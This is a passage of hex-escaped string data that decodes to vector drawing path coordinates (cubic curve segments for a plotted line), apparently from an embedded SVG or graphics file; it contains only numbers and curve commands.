\x39\x39\x20\x38\x2e\x31\x34\x30\x34\x32\x34\x31\x32\x38\x38\x31\
\x20\x31\x31\x2e\x32\x31\x38\x38\x34\x39\x33\x36\x37\x35\x20\x43\
\x20\x38\x2e\x31\x34\x36\x36\x36\x35\x31\x39\x37\x36\x35\x20\x31\
\x31\x2e\x31\x37\x38\x36\x31\x37\x35\x37\x35\x32\x20\x38\x2e\x31\
\x35\x32\x39\x30\x36\x32\x36\x36\x34\x38\x20\x31\x31\x2e\x31\x33\
\x38\x36\x32\x36\x38\x31\x32\x35\x20\x38\x2e\x31\x35\x39\x31\x34\
\x37\x33\x33\x35\x33\x32\x20\x31\x31\x2e\x30\x39\x38\x39\x30\x36\
\x34\x35\x31\x20\x43\x20\x38\x2e\x31\x36\x35\x33\x38\x38\x34\x30\
\x34\x31\x36\x20\x31\x31\x2e\x30\x35\x39\x31\x38\x36\x30\x38\x39\
\x36\x20\x38\x2e\x31\x37\x31\x36\x32\x39\x34\x37\x32\x39\x39\x20\
\x31\x31\x2e\x30\x31\x39\x37\x33\x37\x37\x35\x39\x20\x38\x2e\x31\
\x37\x37\x38\x37\x30\x35\x34\x31\x38\x33\x20\x31\x30\x2e\x39\x38\
\x30\x35\x39\x30\x32\x32\x37\x38\x20\x43\x20\x38\x2e\x31\x38\x34\
\x31\x31\x31\x36\x31\x30\x36\x36\x20\x31\x30\x2e\x39\x34\x31\x34\
\x34\x32\x36\x39\x36\x36\x20\x38\x2e\x31\x39\x30\x33\x35\x32\x36\
\x37\x39\x35\x20\x31\x30\x2e\x39\x30\x32\x35\x39\x37\x37\x37\x37\
\x20\x38\x2e\x31\x39\x36\x35\x39\x33\x37\x34\x38\x33\x34\x20\x31\
\x30\x2e\x38\x36\x34\x30\x38\x33\x35\x38\x39\x38\x20\x43\x20\x38\
\x2e\x32\x30\x32\x38\x33\x34\x38\x31\x37\x31\x37\x20\x31\x30\x2e\
\x38\x32\x35\x35\x36\x39\x34\x30\x32\x36\x20\x38\x2e\x32\x30\x39\
\x30\x37\x35\x38\x38\x36\x30\x31\x20\x31\x30\x2e\x37\x38\x37\x33\
\x38\x37\x39\x34\x30\x31\x20\x38\x2e\x32\x31\x35\x33\x31\x36\x39\
\x35\x34\x38\x34\x20\x31\x30\x2e\x37\x34\x39\x35\x36\x36\x36\x33\
\x31\x37\x20\x43\x20\x38\x2e\x32\x32\x31\x35\x35\x38\x30\x32\x33\
\x36\x38\x20\x31\x30\x2e\x37\x31\x31\x37\x34\x35\x33\x32\x33\x33\
\x20\x38\x2e\x32\x32\x37\x37\x39\x39\x30\x39\x32\x35\x32\x20\x31\
\x30\x2e\x36\x37\x34\x32\x38\x36\x33\x33\x38\x33\x20\x38\x2e\x32\
\x33\x34\x30\x34\x30\x31\x36\x31\x33\x35\x20\x31\x30\x2e\x36\x33\
\x37\x32\x31\x36\x33\x37\x32\x35\x20\x43\x20\x38\x2e\x32\x34\x30\
\x32\x38\x31\x32\x33\x30\x31\x39\x20\x31\x30\x2e\x36\x30\x30\x31\
\x34\x36\x34\x30\x36\x37\x20\x38\x2e\x32\x34\x36\x35\x32\x32\x32\
\x39\x39\x30\x32\x20\x31\x30\x2e\x35\x36\x33\x34\x36\x37\x38\x30\
\x33\x20\x38\x2e\x32\x35\x32\x37\x36\x33\x33\x36\x37\x38\x36\x20\
\x31\x30\x2e\x35\x32\x37\x32\x30\x36\x34\x38\x32\x31\x20\x43\x20\
\x38\x2e\x32\x35\x39\x30\x30\x34\x34\x33\x36\x37\x20\x31\x30\x2e\
\x34\x39\x30\x39\x34\x35\x31\x36\x31\x32\x20\x38\x2e\x32\x36\x35\
\x32\x34\x35\x35\x30\x35\x35\x33\x20\x31\x30\x2e\x34\x35\x35\x31\
\x30\x33\x36\x33\x36\x31\x20\x38\x2e\x32\x37\x31\x34\x38\x36\x35\
\x37\x34\x33\x37\x20\x31\x30\x2e\x34\x31\x39\x37\x30\x37\x30\x31\
\x32\x36\x20\x43\x20\x38\x2e\x32\x37\x37\x37\x32\x37\x36\x34\x33\
\x32\x20\x31\x30\x2e\x33\x38\x34\x33\x31\x30\x33\x38\x39\x20\x38\
\x2e\x32\x38\x33\x39\x36\x38\x37\x31\x32\x30\x34\x20\x31\x30\x2e\
\x33\x34\x39\x33\x36\x31\x33\x34\x36\x20\x38\x2e\x32\x39\x30\x32\
\x30\x39\x37\x38\x30\x38\x38\x20\x31\x30\x2e\x33\x31\x34\x38\x38\
\x34\x31\x33\x35\x34\x20\x43\x20\x38\x2e\x32\x39\x36\x34\x35\x30\
\x38\x34\x39\x37\x31\x20\x31\x30\x2e\x32\x38\x30\x34\x30\x36\x39\
\x32\x34\x38\x20\x38\x2e\x33\x30\x32\x36\x39\x31\x39\x31\x38\x35\
\x35\x20\x31\x30\x2e\x32\x34\x36\x34\x30\x34\x33\x38\x37\x37\x20\
\x38\x2e\x33\x30\x38\x39\x33\x32\x39\x38\x37\x33\x38\x20\x31\x30\
\x2e\x32\x31\x32\x38\x39\x39\x38\x38\x34\x36\x20\x43\x20\x38\x2e\
\x33\x31\x35\x31\x37\x34\x30\x35\x36\x32\x32\x20\x31\x30\x2e\x31\
\x37\x39\x33\x39\x35\x33\x38\x31\x36\x20\x38\x2e\x33\x32\x31\x34\
\x31\x35\x31\x32\x35\x30\x36\x20\x31\x30\x2e\x31\x34\x36\x33\x39\
\x31\x39\x31\x31\x31\x20\x38\x2e\x33\x32\x37\x36\x35\x36\x31\x39\
\x33\x38\x39\x20\x31\x30\x2e\x31\x31\x33\x39\x31\x31\x39\x30\x36\
\x34\x20\x43\x20\x38\x2e\x33\x33\x33\x38\x39\x37\x32\x36\x32\x37\
\x33\x20\x31\x30\x2e\x30\x38\x31\x34\x33\x31\x39\x30\x31\x37\x20\
\x38\x2e\x33\x34\x30\x31\x33\x38\x33\x33\x31\x35\x36\x20\x31\x30\
\x2e\x30\x34\x39\x34\x37\x38\x35\x31\x34\x33\x20\x38\x2e\x33\x34\
\x36\x33\x37\x39\x34\x30\x30\x34\x20\x31\x30\x2e\x30\x31\x38\x30\
\x37\x33\x32\x31\x35\x33\x20\x43\x20\x38\x2e\x33\x35\x32\x36\x32\
\x30\x34\x36\x39\x32\x34\x20\x39\x2e\x39\x38\x36\x36\x36\x37\x39\
\x31\x36\x32\x36\x20\x38\x2e\x33\x35\x38\x38\x36\x31\x35\x33\x38\
\x30\x37\x20\x39\x2e\x39\x35\x35\x38\x31\x34\x30\x30\x35\x30\x39\
\x20\x38\x2e\x33\x36\x35\x31\x30\x32\x36\x30\x36\x39\x31\x20\x39\
\x2e\x39\x32\x35\x35\x33\x31\x39\x35\x37\x36\x37\x20\x43\x20\x38\
\x2e\x33\x37\x31\x33\x34\x33\x36\x37\x35\x37\x34\x20\x39\x2e\x38\
\x39\x35\x32\x34\x39\x39\x31\x30\x32\x35\x20\x38\x2e\x33\x37\x37\
\x35\x38\x34\x37\x34\x34\x35\x38\x20\x39\x2e\x38\x36\x35\x35\x34\
\x33\x31\x36\x38\x39\x37\x20\x38\x2e\x33\x38\x33\x38\x32\x35\x38\
\x31\x33\x34\x32\x20\x39\x2e\x38\x33\x36\x34\x33\x31\x31\x38\x32\
\x38\x31\x20\x43\x20\x38\x2e\x33\x39\x30\x30\x36\x36\x38\x38\x32\
\x32\x35\x20\x39\x2e\x38\x30\x37\x33\x31\x39\x31\x39\x36\x36\x35\
\x20\x38\x2e\x33\x39\x36\x33\x30\x37\x39\x35\x31\x30\x39\x20\x39\
\x2e\x37\x37\x38\x38\x30\x35\x35\x34\x35\x36\x32\x20\x38\x2e\x34\
\x30\x32\x35\x34\x39\x30\x31\x39\x39\x32\x20\x39\x2e\x37\x35\x30\
\x39\x30\x38\x36\x32\x31\x37\x31\x20\x43\x20\x38\x2e\x34\x30\x38\
\x37\x39\x30\x30\x38\x38\x37\x36\x20\x39\x2e\x37\x32\x33\x30\x31\
\x31\x36\x39\x37\x38\x20\x38\x2e\x34\x31\x35\x30\x33\x31\x31\x35\
\x37\x36\x20\x39\x2e\x36\x39\x35\x37\x33\x35\x32\x31\x33\x31\x32\
\x20\x38\x2e\x34\x32\x31\x32\x37\x32\x32\x32\x36\x34\x33\x20\x39\
\x2e\x36\x36\x39\x30\x39\x36\x34\x37\x34\x32\x32\x20\x43\x20\x38\
\x2e\x34\x32\x37\x35\x31\x33\x32\x39\x35\x32\x37\x20\x39\x2e\x36\
\x34\x32\x34\x35\x37\x37\x33\x35\x33\x32\x20\x38\x2e\x34\x33\x33\
\x37\x35\x34\x33\x36\x34\x31\x31\x20\x39\x2e\x36\x31\x36\x34\x36\
\x30\x35\x38\x30\x36\x38\x20\x38\x2e\x34\x33\x39\x39\x39\x35\x34\
\x33\x32\x39\x34\x20\x39\x2e\x35\x39\x31\x31\x32\x31\x32\x30\x34\
\x36\x36\x20\x43\x20\x38\x2e\x34\x34\x36\x32\x33\x36\x35\x30\x31\
\x37\x38\x20\x39\x2e\x35\x36\x35\x37\x38\x31\x38\x32\x38\x36\x35\
\x20\x38\x2e\x34\x35\x32\x34\x37\x37\x35\x37\x30\x36\x31\x20\x39\
\x2e\x35\x34\x31\x31\x30\x34\x31\x39\x30\x31\x35\x20\x38\x2e\x34\
\x35\x38\x37\x31\x38\x36\x33\x39\x34\x35\x20\x39\x2e\x35\x31\x37\
\x31\x30\x33\x33\x34\x36\x33\x35\x20\x43\x20\x38\x2e\x34\x36\x34\
\x39\x35\x39\x37\x30\x38\x32\x39\x20\x39\x2e\x34\x39\x33\x31\x30\
\x32\x35\x30\x32\x35\x36\x20\x38\x2e\x34\x37\x31\x32\x30\x30\x37\
\x37\x37\x31\x32\x20\x39\x2e\x34\x36\x39\x37\x38\x32\x35\x32\x36\
\x36\x33\x20\x38\x2e\x34\x37\x37\x34\x34\x31\x38\x34\x35\x39\x36\
\x20\x39\x2e\x34\x34\x37\x31\x35\x37\x33\x31\x35\x32\x39\x20\x43\
\x20\x38\x2e\x34\x38\x33\x36\x38\x32\x39\x31\x34\x37\x39\x20\x39\
\x2e\x34\x32\x34\x35\x33\x32\x31\x30\x33\x39\x35\x20\x38\x2e\x34\
\x38\x39\x39\x32\x33\x39\x38\x33\x36\x33\x20\x39\x2e\x34\x30\x32\
\x36\x30\x35\x38\x33\x38\x33\x37\x20\x38\x2e\x34\x39\x36\x31\x36\
\x35\x30\x35\x32\x34\x37\x20\x39\x2e\x33\x38\x31\x33\x39\x31\x32\
\x33\x33\x32\x39\x20\x43\x20\x38\x2e\x35\x30\x32\x34\x30\x36\x31\
\x32\x31\x33\x20\x39\x2e\x33\x36\x30\x31\x37\x36\x36\x32\x38\x32\
\x31\x20\x38\x2e\x35\x30\x38\x36\x34\x37\x31\x39\x30\x31\x34\x20\
\x39\x2e\x33\x33\x39\x36\x37\x37\x39\x36\x36\x33\x35\x20\x38\x2e\
\x35\x31\x34\x38\x38\x38\x32\x35\x38\x39\x37\x20\x39\x2e\x33\x31\
\x39\x39\x30\x36\x37\x36\x30\x38\x34\x20\x43\x20\x38\x2e\x35\x32\
\x31\x31\x32\x39\x33\x32\x37\x38\x31\x20\x39\x2e\x33\x30\x30\x31\
\x33\x35\x35\x35\x35\x33\x33\x20\x38\x2e\x35\x32\x37\x33\x37\x30\
\x33\x39\x36\x36\x35\x20\x39\x2e\x32\x38\x31\x30\x39\x36\x31\x38\
\x33\x37\x39\x20\x38\x2e\x35\x33\x33\x36\x31\x31\x34\x36\x35\x34\
\x38\x20\x39\x2e\x32\x36\x32\x37\x39\x38\x39\x33\x39\x39\x36\x20\
\x43\x20\x38\x2e\x35\x33\x39\x38\x35\x32\x35\x33\x34\x33\x32\x20\
\x39\x2e\x32\x34\x34\x35\x30\x31\x36\x39\x36\x31\x33\x20\x38\x2e\
\x35\x34\x36\x30\x39\x33\x36\x30\x33\x31\x35\x20\x39\x2e\x32\x32\
\x36\x39\x35\x31\x30\x34\x35\x37\x38\x20\x38\x2e\x35\x35\x32\x33\
\x33\x34\x36\x37\x31\x39\x39\x20\x39\x2e\x32\x31\x30\x31\x35\x36\
\x30\x34\x37\x33\x31\x20\x43\x20\x38\x2e\x35\x35\x38\x35\x37\x35\
\x37\x34\x30\x38\x33\x20\x39\x2e\x31\x39\x33\x33\x36\x31\x30\x34\
\x38\x38\x34\x20\x38\x2e\x35\x36\x34\x38\x31\x36\x38\x30\x39\x36\
\x36\x20\x39\x2e\x31\x37\x37\x33\x32\x36\x32\x34\x39\x32\x37\x20\
\x38\x2e\x35\x37\x31\x30\x35\x37\x38\x37\x38\x35\x20\x39\x2e\x31\
\x36\x32\x30\x35\x39\x34\x35\x37\x36\x39\x20\x43\x20\x38\x2e\x35\
\x37\x37\x32\x39\x38\x39\x34\x37\x33\x33\x20\x39\x2e\x31\x34\x36\
\x37\x39\x32\x36\x36\x36\x31\x20\x38\x2e\x35\x38\x33\x35\x34\x30\
\x30\x31\x36\x31\x37\x20\x39\x2e\x31\x33\x32\x32\x39\x38\x35\x30\
\x33\x37\x34\x20\x38\x2e\x35\x38\x39\x37\x38\x31\x30\x38\x35\x30\
\x31\x20\x39\x2e\x31\x31\x38\x35\x38\x33\x35\x31\x38\x32\x38\x20\
\x43\x20\x38\x2e\x35\x39\x36\x30\x32\x32\x31\x35\x33\x38\x34\x20\
\x39\x2e\x31\x30\x34\x38\x36\x38\x35\x33\x32\x38\x32\x20\x38\x2e\
\x36\x30\x32\x32\x36\x33\x32\x32\x32\x36\x38\x20\x39\x2e\x30\x39\
\x31\x39\x33\x37\x34\x31\x32\x35\x38\x20\x38\x2e\x36\x30\x38\x35\
\x30\x34\x32\x39\x31\x35\x31\x20\x39\x2e\x30\x37\x39\x37\x39\x35\
\x34\x33\x33\x37\x31\x20\x43\x20\x38\x2e\x36\x31\x34\x37\x34\x35\
\x33\x36\x30\x33\x35\x20\x39\x2e\x30\x36\x37\x36\x35\x33\x34\x35\
\x34\x38\x35\x20\x38\x2e\x36\x32\x30\x39\x38\x36\x34\x32\x39\x31\
\x39\x20\x39\x2e\x30\x35\x36\x33\x30\x35\x33\x36\x35\x35\x32\x20\
\x38\x2e\x36\x32\x37\x32\x32\x37\x34\x39\x38\x30\x32\x20\x39\x2e\
\x30\x34\x35\x37\x35\x35\x31\x36\x32\x31\x39\x20\x43\x20\x38\x2e\
\x36\x33\x33\x34\x36\x38\x35\x36\x36\x38\x36\x20\x39\x2e\x30\x33\
\x35\x32\x30\x34\x39\x35\x38\x38\x37\x20\x38\x2e\x36\x33\x39\x37\
\x30\x39\x36\x33\x35\x36\x39\x20\x39\x2e\x30\x32\x35\x34\x35\x37\
\x34\x34\x32\x32\x20\x38\x2e\x36\x34\x35\x39\x35\x30\x37\x30\x34\
\x35\x33\x20\x39\x2e\x30\x31\x36\x35\x31\x35\x33\x32\x32\x38\x20\
\x43\x20\x38\x2e\x36\x35\x32\x31\x39\x31\x37\x37\x33\x33\x37\x20\
\x39\x2e\x30\x30\x37\x35\x37\x33\x32\x30\x33\x34\x20\x38\x2e\x36\
\x35\x38\x34\x33\x32\x38\x34\x32\x32\x20\x38\x2e\x39\x39\x39\x34\
\x34\x31\x33\x32\x36\x39\x39\x20\x38\x2e\x36\x36\x34\x36\x37\x33\
\x39\x31\x31\x30\x34\x20\x38\x2e\x39\x39\x32\x31\x32\x31\x31\x31\
\x34\x31\x35\x20\x43\x20\x38\x2e\x36\x37\x30\x39\x31\x34\x39\x37\
\x39\x38\x37\x20\x38\x2e\x39\x38\x34\x38\x30\x30\x39\x30\x31\x33\
\x31\x20\x38\x2e\x36\x37\x37\x31\x35\x36\x30\x34\x38\x37\x31\x20\
\x38\x2e\x39\x37\x38\x32\x39\x37\x32\x33\x35\x33\x33\x20\x38\x2e\
\x36\x38\x33\x33\x39\x37\x31\x31\x37\x35\x35\x20\x38\x2e\x39\x37\
\x32\x36\x31\x30\x32\x34\x34\x35\x35\x20\x43\x20\x38\x2e\x36\x38\
\x39\x36\x33\x38\x31\x38\x36\x33\x38\x20\x38\x2e\x39\x36\x36\x39\
\x32\x33\x32\x35\x33\x37\x38\x20\x38\x2e\x36\x39\x35\x38\x37\x39\
\x32\x35\x35\x32\x32\x20\x38\x2e\x39\x36\x32\x30\x35\x37\x38\x35\
\x31\x35\x32\x20\x38\x2e\x37\x30\x32\x31\x32\x30\x33\x32\x34\x30\
\x36\x20\x38\x2e\x39\x35\x38\x30\x31\x32\x38\x37\x33\x36\x39\x20\
\x43\x20\x38\x2e\x37\x30\x38\x33\x36\x31\x33\x39\x32\x38\x39\x20\
\x38\x2e\x39\x35\x33\x39\x36\x37\x38\x39\x35\x38\x37\x20\x38\x2e\
\x37\x31\x34\x36\x30\x32\x34\x36\x31\x37\x33\x20\x38\x2e\x39\x35\
\x30\x37\x34\x38\x32\x37\x38\x32\x32\x20\x38\x2e\x37\x32\x30\x38\
\x34\x33\x35\x33\x30\x35\x36\x20\x38\x2e\x39\x34\x38\x33\x35\x31\
\x35\x36\x36\x30\x33\x20\x43\x20\x38\x2e\x37\x32\x37\x30\x38\x34\
\x35\x39\x39\x34\x20\x38\x2e\x39\x34\x35\x39\x35\x34\x38\x35\x33\
\x38\x34\x20\x38\x2e\x37\x33\x33\x33\x32\x35\x36\x36\x38\x32\x34\
\x20\x38\x2e\x39\x34\x34\x33\x38\x35\x39\x39\x37\x36\x35\x20\x38\
\x2e\x37\x33\x39\x35\x36\x36\x37\x33\x37\x30\x37\x20\x38\x2e\x39\
\x34\x33\x36\x34\x31\x32\x35\x35\x39\x20\x43\x20\x38\x2e\x37\x34\
\x35\x38\x30\x37\x38\x30\x35\x39\x31\x20\x38\x2e\x39\x34\x32\x38\
\x39\x36\x35\x31\x34\x31\x35\x20\x38\x2e\x37\x35\x32\x30\x34\x38\
\x38\x37\x34\x37\x34\x20\x38\x2e\x39\x34\x32\x39\x38\x30\x38\x34\
\x34\x35\x35\x20\x38\x2e\x37\x35\x38\x32\x38\x39\x39\x34\x33\x35\
\x38\x20\x38\x2e\x39\x34\x33\x38\x38\x39\x32\x32\x34\x34\x36\x20\
\x43\x20\x38\x2e\x37\x36\x34\x35\x33\x31\x30\x31\x32\x34\x32\x20\
\x38\x2e\x39\x34\x34\x37\x39\x37\x36\x30\x34\x33\x37\x20\x38\x2e\
\x37\x37\x30\x37\x37\x32\x30\x38\x31\x32\x35\x20\x38\x2e\x39\x34\
\x36\x35\x33\x34\x39\x39\x30\x39\x39\x20\x38\x2e\x37\x37\x37\x30\
\x31\x33\x31\x35\x30\x30\x39\x20\x38\x2e\x39\x34\x39\x30\x39\x35\
\x30\x38\x38\x34\x20\x43\x20\x38\x2e\x37\x38\x33\x32\x35\x34\x32\
\x31\x38\x39\x32\x20\x38\x2e\x39\x35\x31\x36\x35\x35\x31\x38\x35\
\x38\x20\x38\x2e\x37\x38\x39\x34\x39\x35\x32\x38\x37\x37\x36\x20\
\x38\x2e\x39\x35\x35\x30\x34\x32\x39\x34\x33\x30\x31\x20\x38\x2e\
\x37\x39\x35\x37\x33\x36\x33\x35\x36\x36\x20\x38\x2e\x39\x35\x39\
\x32\x35\x30\x38\x30\x30\x35\x34\x20\x43\x20\x38\x2e\x38\x30\x31\
\x39\x37\x37\x34\x32\x35\x34\x33\x20\x38\x2e\x39\x36\x33\x34\x35\
\x38\x36\x35\x38\x30\x37\x20\x38\x2e\x38\x30\x38\x32\x31\x38\x34\
\x39\x34\x32\x37\x20\x38\x2e\x39\x36\x38\x34\x39\x31\x35\x34\x39\
\x31\x32\x20\x38\x2e\x38\x31\x34\x34\x35\x39\x35\x36\x33\x31\x20\
\x38\x2e\x39\x37\x34\x33\x34\x30\x36\x36\x32\x33\x31\x20\x43\x20\
\x38\x2e\x38\x32\x30\x37\x30\x30\x36\x33\x31\x39\x34\x20\x38\x2e\
\x39\x38\x30\x31\x38\x39\x37\x37\x35\x35\x31\x20\x38\x2e\x38\x32\
\x36\x39\x34\x31\x37\x30\x30\x37\x38\x20\x38\x2e\x39\x38\x36\x38\
\x36\x30\x30\x32\x30\x35\x39\x20\x38\x2e\x38\x33\x33\x31\x38\x32\
\x37\x36\x39\x36\x31\x20\x38\x2e\x39\x39\x34\x33\x34\x31\x33\x34\
\x37\x39\x36\x20\x43\x20\x38\x2e\x38\x33\x39\x34\x32\x33\x38\x33\
\x38\x34\x35\x20\x39\x2e\x30\x30\x31\x38\x32\x32\x36\x37\x35\x33\
\x32\x20\x38\x2e\x38\x34\x35\x36\x36\x34\x39\x30\x37\x32\x38\x20\
\x39\x2e\x30\x31\x30\x31\x31\x39\x39\x36\x33\x36\x36\x20\x38\x2e\
\x38\x35\x31\x39\x30\x35\x39\x37\x36\x31\x32\x20\x39\x2e\x30\x31\
\x39\x32\x32\x31\x39\x34\x30\x36\x34\x20\x43\x20\x38\x2e\x38\x35\
\x38\x31\x34\x37\x30\x34\x34\x39\x36\x20\x39\x2e\x30\x32\x38\x33\
\x32\x33\x39\x31\x37\x36\x32\x20\x38\x2e\x38\x36\x34\x33\x38\x38\
\x31\x31\x33\x37\x39\x20\x39\x2e\x30\x33\x38\x32\x33\x35\x34\x32\
\x33\x33\x35\x20\x38\x2e\x38\x37\x30\x36\x32\x39\x31\x38\x32\x36\
\x33\x20\x39\x2e\x30\x34\x38\x39\x34\x33\x39\x38\x30\x32\x31\x20\
\x43\x20\x38\x2e\x38\x37\x36\x38\x37\x30\x32\x35\x31\x34\x36\x20\
\x39\x2e\x30\x35\x39\x36\x35\x32\x35\x33\x37\x30\x36\x20\x38\x2e\
\x38\x38\x33\x31\x31\x31\x33\x32\x30\x33\x20\x39\x2e\x30\x37\x31\
\x31\x36\x32\x39\x33\x39\x31\x20\x38\x2e\x38\x38\x39\x33\x35\x32\
\x33\x38\x39\x31\x34\x20\x39\x2e\x30\x38\x33\x34\x36\x31\x35\x32\
\x32\x36\x36\x20\x43\x20\x38\x2e\x38\x39\x35\x35\x39\x33\x34\x35\
\x37\x39\x37\x20\x39\x2e\x30\x39\x35\x37\x36\x30\x31\x30\x36\x32\
\x33\x20\x38\x2e\x39\x30\x31\x38\x33\x34\x35\x32\x36\x38\x31\x20\
\x39\x2e\x31\x30\x38\x38\x35\x31\x36\x31\x31\x39\x20\x38\x2e\x39\
\x30\x38\x30\x37\x35\x35\x39\x35\x36\x34\x20\x39\x2e\x31\x32\x32\
\x37\x32\x31\x32\x31\x31\x31\x36\x20\x43\x20\x38\x2e\x39\x31\x34\
\x33\x31\x36\x36\x36\x34\x34\x38\x20\x39\x2e\x31\x33\x36\x35\x39\
\x30\x38\x31\x30\x34\x31\x20\x38\x2e\x39\x32\x30\x35\x35\x37\x37\
\x33\x33\x33\x32\x20\x39\x2e\x31\x35\x31\x32\x34\x33\x31\x38\x33\
\x30\x32\x20\x38\x2e\x39\x32\x36\x37\x39\x38\x38\x30\x32\x31\x35\
\x20\x39\x2e\x31\x36\x36\x36\x36\x32\x33\x35\x38\x35\x20\x43\x20\
\x38\x2e\x39\x33\x33\x30\x33\x39\x38\x37\x30\x39\x39\x20\x39\x2e\
\x31\x38\x32\x30\x38\x31\x35\x33\x33\x39\x37\x20\x38\x2e\x39\x33\
\x39\x32\x38\x30\x39\x33\x39\x38\x32\x20\x39\x2e\x31\x39\x38\x32\
\x37\x32\x31\x32\x34\x30\x34\x20\x38\x2e\x39\x34\x35\x35\x32\x32\
\x30\x30\x38\x36\x36\x20\x39\x2e\x32\x31\x35\x32\x31\x37\x30\x34\
\x30\x39\x34\x20\x43\x20\x38\x2e\x39\x35\x31\x37\x36\x33\x30\x37\
\x37\x35\x20\x39\x2e\x32\x33\x32\x31\x36\x31\x39\x35\x37\x38\x34\
\x20\x38\x2e\x39\x35\x38\x30\x30\x34\x31\x34\x36\x33\x33\x20\x39\
\x2e\x32\x34\x39\x38\x36\x35\x37\x33\x38\x31\x33\x20\x38\x2e\x39\
\x36\x34\x32\x34\x35\x32\x31\x35\x31\x37\x20\x39\x2e\x32\x36\x38\
\x33\x31\x30\x32\x30\x33\x31\x38\x20\x43\x20\x38\x2e\x39\x37\x30\
\x34\x38\x36\x32\x38\x34\x30\x31\x20\x39\x2e\x32\x38\x36\x37\x35\
\x34\x36\x36\x38\x32\x34\x20\x38\x2e\x39\x37\x36\x37\x32\x37\x33\
\x35\x32\x38\x34\x20\x39\x2e\x33\x30\x35\x39\x34\x34\x32\x37\x32\
\x34\x34\x20\x38\x2e\x39\x38\x32\x39\x36\x38\x34\x32\x31\x36\x38\
\x20\x39\x2e\x33\x32\x35\x38\x35\x39\x37\x37\x34\x34\x20\x43\x20\
\x38\x2e\x39\x38\x39\x32\x30\x39\x34\x39\x30\x35\x31\x20\x39\x2e\
\x33\x34\x35\x37\x37\x35\x32\x37\x36\x33\x36\x20\x38\x2e\x39\x39\
\x35\x34\x35\x30\x35\x35\x39\x33\x35\x20\x39\x2e\x33\x36\x36\x34\
\x32\x31\x30\x34\x31\x33\x39\x20\x39\x2e\x30\x30\x31\x36\x39\x31\
\x36\x32\x38\x31\x39\x20\x39\x2e\x33\x38\x37\x37\x37\x36\x37\x39\
\x35\x30\x39\x20\x43\x20\x39\x2e\x30\x30\x37\x39\x33\x32\x36\x39\
\x37\x30\x32\x20\x39\x2e\x34\x30\x39\x31\x33\x32\x35\x34\x38\x37\
\x38\x20\x39\x2e\x30\x31\x34\x31\x37\x33\x37\x36\x35\x38\x36\x20\
\x39\x2e\x34\x33\x31\x32\x30\x32\x35\x36\x30\x36\x35\x20\x39\x2e\
\x30\x32\x30\x34\x31\x34\x38\x33\x34\x36\x39\x20\x39\x2e\x34\x35\
\x33\x39\x36\x35\x35\x35\x34\x35\x39\x20\x43\x20\x39\x2e\x30\x32\
\x36\x36\x35\x35\x39\x30\x33\x35\x33\x20\x39\x2e\x34\x37\x36\x37\
\x32\x38\x35\x34\x38\x35\x34\x20\x39\x2e\x30\x33\x32\x38\x39\x36\
\x39\x37\x32\x33\x37\x20\x39\x2e\x35\x30\x30\x31\x38\x38\x36\x39\
\x31\x36\x36\x20\x39\x2e\x30\x33\x39\x31\x33\x38\x30\x34\x31\x32\
\x20\x39\x2e\x35\x32\x34\x33\x32\x33\x37\x33\x39\x30\x36\x20\x43\
\x20\x39\x2e\x30\x34\x35\x33\x37\x39\x31\x31\x30\x30\x34\x20\x39\
\x2e\x35\x34\x38\x34\x35\x38\x37\x38\x36\x34\x36\x20\x39\x2e\x30\
\x35\x31\x36\x32\x30\x31\x37\x38\x38\x37\x20\x39\x2e\x35\x37\x33\
\x32\x37\x32\x37\x39\x36\x34\x20\x39\x2e\x30\x35\x37\x38\x36\x31\
\x32\x34\x37\x37\x31\x20\x39\x2e\x35\x39\x38\x37\x34\x32\x35\x38\
\x39\x35\x37\x20\x43\x20\x39\x2e\x30\x36\x34\x31\x30\x32\x33\x31\
\x36\x35\x35\x20\x39\x2e\x36\x32\x34\x32\x31\x32\x33\x38\x32\x37\
\x33\x20\x39\x2e\x30\x37\x30\x33\x34\x33\x33\x38\x35\x33\x38\x20\
\x39\x2e\x36\x35\x30\x33\x34\x31\x39\x30\x32\x32\x36\x20\x39\x2e\
\x30\x37\x36\x35\x38\x34\x34\x35\x34\x32\x32\x20\x39\x2e\x36\x37\
\x37\x31\x30\x37\x30\x37\x30\x32\x37\x20\x43\x20\x39\x2e\x30\x38\
\x32\x38\x32\x35\x35\x32\x33\x30\x35\x20\x39\x2e\x37\x30\x33\x38\
\x37\x32\x32\x33\x38\x32\x38\x20\x39\x2e\x30\x38\x39\x30\x36\x36\
\x35\x39\x31\x38\x39\x20\x39\x2e\x37\x33\x31\x32\x37\x36\x38\x37\
\x36\x36\x37\x20\x39\x2e\x30\x39\x35\x33\x30\x37\x36\x36\x30\x37\
\x33\x20\x39\x2e\x37\x35\x39\x32\x39\x36\x30\x34\x36\x32\x31\x20\
\x43\x20\x39\x2e\x31\x30\x31\x35\x34\x38\x37\x32\x39\x35\x36\x20\
\x39\x2e\x37\x38\x37\x33\x31\x35\x32\x31\x35\x37\x35\x20\x39\x2e\
\x31\x30\x37\x37\x38\x39\x37\x39\x38\x34\x20\x39\x2e\x38\x31\x35\
\x39\x35\x32\x36\x31\x31\x32\x32\x20\x39\x2e\x31\x31\x34\x30\x33\
\x30\x38\x36\x37\x32\x33\x20\x39\x2e\x38\x34\x35\x31\x38\x32\x34\
\x37\x30\x35\x37\x20\x43\x20\x39\x2e\x31\x32\x30\x32\x37\x31\x39\
\x33\x36\x30\x37\x20\x39\x2e\x38\x37\x34\x34\x31\x32\x33\x32\x39\
\x39\x32\x20\x39\x2e\x31\x32\x36\x35\x31\x33\x30\x30\x34\x39\x31\
\x20\x39\x2e\x39\x30\x34\x32\x33\x38\x32\x31\x35\x30\x39\x20\x39\
\x2e\x31\x33\x32\x37\x35\x34\x30\x37\x33\x37\x34\x20\x39\x2e\x39\
\x33\x34\x36\x33\x33\x35\x38\x31\x30\x35\x20\x43\x20\x39\x2e\x31\
\x33\x38\x39\x39\x35\x31\x34\x32\x35\x38\x20\x39\x2e\x39\x36\x35\
\x30\x32\x38\x39\x34\x37\x30\x31\x20\x39\x2e\x31\x34\x35\x32\x33\
\x36\x32\x31\x31\x34\x31\x20\x39\x2e\x39\x39\x35\x39\x39\x37\x32\
\x31\x37\x33\x36\x20\x39\x2e\x31\x35\x31\x34\x37\x37\x32\x38\x30\
\x32\x35\x20\x31\x30\x2e\x30\x32\x37\x35\x31\x31\x31\x30\x35\x31\
\x20\x43\x20\x39\x2e\x31\x35\x37\x37\x31\x38\x33\x34\x39\x30\x39\
\x20\x31\x30\x2e\x30\x35\x39\x30\x32\x34\x39\x39\x32\x39\x20\x39\
\x2e\x31\x36\x33\x39\x35\x39\x34\x31\x37\x39\x32\x20\x31\x30\x2e\
